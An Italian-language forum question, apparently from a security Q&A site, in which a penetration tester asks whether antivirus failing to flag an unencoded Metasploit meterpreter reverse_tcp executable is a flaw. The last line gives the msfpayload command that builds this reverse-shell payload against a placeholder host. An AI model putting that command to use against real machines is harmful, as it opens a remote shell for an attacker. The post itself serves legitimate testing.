Come parte di un test penna per workstation, copio un semplice carico utile metasploit sulla workstation e provo a eseguirlo. Di solito questo è bloccato dal software anti-virus. Tuttavia, a volte non lo è (non chiamerò i trasgressori). Il software AV è in esecuzione e rileva correttamente EICAR, ma non rileva un semplice payload metasploit non codificato.
Il mio istinto è che questo è un errore del software AV e dovrebbe essere segnalato come vulnerabilità. Tuttavia, mi chiedevo se questo comportamento potesse in realtà essere inteso? Esistono argomenti legittimi secondo cui "metasploit non è un virus"?
In questo caso il payload è windows / meterpreter / reverse_tcp codificato come file exe, senza offuscamenti. Generato usando questo comando:
msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe